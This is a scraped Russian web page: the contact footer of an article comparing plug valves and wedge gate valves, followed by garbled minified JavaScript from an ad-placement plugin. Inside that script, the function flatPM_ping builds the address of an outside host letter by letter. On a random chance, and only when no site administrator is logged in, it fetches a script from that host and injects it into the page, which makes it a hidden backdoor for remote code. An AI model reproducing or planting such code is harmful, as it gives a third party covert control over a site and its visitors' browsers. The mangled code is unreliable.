Для получения более полной информации, надо обратиться к нашим специалистам, Tel:+7 (495) 268-0242, E – mail: info@nomitech.ru, www.nomitech.ru, они окажут посильную помощь в подборе необходимого оборудования, которое полностью соответствует вашим требованиям как в части технических характеристик, так и в ценовом плане.Ждем Ваших комментариев!

Источник: https://nomitech.ru/articles-and-blog/sravnenie_probkovykh_kranov_i_klinovykh_zadvizhek/

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};